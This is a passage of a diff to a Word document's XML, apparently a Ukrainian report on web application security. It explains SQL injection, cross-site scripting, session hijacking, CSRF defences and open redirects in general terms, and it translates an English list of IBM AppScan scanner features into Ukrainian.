+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>П</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ідтримка </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>інструментів</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>в наявності є</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> інструменти, такі як Authentication Tester, Token Analy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">zer і HTTP Request Editor, які можуть бути використані </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>при тестуванні на наявність вразливостей вручну.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>П</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>ідтримка</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Ajax </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>і</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dojo frameworks.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24783,6 +25498,23 @@
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -25122,19 +25854,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Ін’єкція коду завжди була однією з найбільш значущих і поширених вразливостей Web-додатків, тому не дивно, що цей тип вразливостей займає верхню строчку списку OWASP. Існує безліч різновидів цієї уразливості, але до сих пір самою сумнозвісною з них є ін’єкція SQL-коду. Вона успішно використовується хакерами протягом більше десяти років. SQL ін'єкція полягає в тому, що зловмисник вводить SQL-команди в поле введення. Якщо код Web-додатка не відфільтровує дані, то на Web-сервері можна запустити SQL-команди і виконувати прямі запити до внутрішньої бази даних в обхід </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>мережевих засобів захисту. Шляхом впровадження SQL-коду зловмисник може дістати таблиці з даними, змінити записи в таблицях і навіть повністю видалити базу даних.</w:t>
+        <w:t>Ін’єкція коду завжди була однією з найбільш значущих і поширених вразливостей Web-додатків, тому не дивно, що цей тип вразливостей займає верхню строчку списку OWASP. Існує безліч різновидів цієї уразливості, але до сих пір самою сумнозвісною з них є ін’єкція SQL-коду. Вона успішно використовується хакерами протягом більше десяти років. SQL ін'єкція полягає в тому, що зловмисник вводить SQL-команди в поле введення. Якщо код Web-додатка не відфільтровує дані, то на Web-сервері можна запустити SQL-команди і виконувати прямі запити до внутрішньої бази даних в обхід мережевих засобів захисту. Шляхом впровадження SQL-коду зловмисник може дістати таблиці з даними, змінити записи в таблицях і навіть повністю видалити базу даних.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25240,6 +25960,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Зловмисник може спробувати вкрасти (несанкціоновано використовувати) Web-сеанс користувача, дізнавшись його секретний ідентифікатор. Знаючи секретний ідентифікатор сеансу, атакуючий може представитися Web-серверу аутентиф</w:t>
       </w:r>
       <w:r>
@@ -25385,19 +26106,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Міжсайтовий скриптинг (cross-site scripting, XSS) - це ще один різновид атаки на Web-додатки, що зберігає популярність вже багато років. Якщо Web-додаток містить XSS-уразливість, то зловмисник може впровадити на Web-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>сторінку шкідливий сценарій, що виконується при завантаженні сторінки користувачем.</w:t>
+        <w:t>Міжсайтовий скриптинг (cross-site scripting, XSS) - це ще один різновид атаки на Web-додатки, що зберігає популярність вже багато років. Якщо Web-додаток містить XSS-уразливість, то зловмисник може впровадити на Web-сторінку шкідливий сценарій, що виконується при завантаженні сторінки користувачем.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25534,6 +26243,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Вразливість</w:t>
       </w:r>
       <w:r>
@@ -25682,7 +26392,6 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Виведені додатком повідомлення про помилки, дозволяють зловмисникам краще зрозуміти структуру бази даних і підказують, в якому напрямку краще діяти, які команди і сценарії краще намагатися впроваджувати.</w:t>
       </w:r>
     </w:p>
@@ -25833,6 +26542,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Користувачі, що працюють з </w:t>
       </w:r>
       <w:r>
@@ -26109,19 +26819,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Для захисту від підробки міжсайтових запитів розробники можуть скористатися різними прийомами, включаючи обов'язкове використання в кожному запиті випадкового маркера для перевірки достовірності сеансу або </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>використання випадкових імен п</w:t>
+        <w:t>Для захисту від підробки міжсайтових запитів розробники можуть скористатися різними прийомами, включаючи обов'язкове використання в кожному запиті випадкового маркера для перевірки достовірності сеансу або використання випадкових імен п</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -26361,6 +27059,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Web-додатки часто перенаправляють користувачів на інші сторінки за допомогою певних параметрів. Якщо ці параметри не перевіряються, то зловмисник може обманним шляхом перенаправити користувача на шкідливу Web-сторінку, змусивши його розкрити свій пароль та інші важливі дані. Наприклад, зловмисник може створити повідомлення електронної пошти з фішинговою посиланням, що містить ім'я необхідного Web-сайту. При цьому відповідальний за перенаправлення параметр, що міститься в кінці URL-адреси, може бути не видно користувачеві, в результаті чого користувач з великою ймовірністю клацне за цим посиланням або скопіює її в Web-браузер, так як доменне ім'я в URL-адресі не викличе у нього ніяких підозр.</w:t>
       </w:r>
     </w:p>
@@ -26372,8 +27071,6 @@
         <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
           <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -26393,362 +27090,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>Main features in Appscan:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">A </w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>The Rational Appscan 8.5 Standard edition has many new features, most of which I cover in the brief outline below:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:right="360"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Flash support: Appscan 8.0 has increased flash support compared to its earlier versions. It can now explore and test applications based on an Adobe Flex framework. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>AMF protocol is also supported.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:right="360"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Glass box testing: Glass box scanning is a new feature introduced in Appscan. This process installs an agent on the server which helps find hidden URLs and additional issues.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:right="360"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>Web services scanning: Web service scanning is one area which organizations are looking for a more effective automated support, and Appscan has scored well in this area.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:right="360"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Java script security </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>analyzer :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Appscan has introduced JavaScript security analyser which analyses the crawled html pages for vulnerabilities and allows users to focus on different client-side issues and DOM (document object model) based XSS problems.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:right="360"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>Reporting: Based on your requirements, you can generate reports in desired formats and include desired fields in it.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:right="360"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>Remediation support: For the identified vulnerabilities, the program provides a description of the issue along with the remediation notes.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:right="360"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Customizable scanning policies: Appscan comes with a set of defined scanning policies. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>You can customize the policies to suit your needs.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:right="360"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>Tools support: It has tools like Authentication Tester, Token Analyzer, and HTTP Request Editor which comes in handy when testing for vulnerabilities manually.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:right="360"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
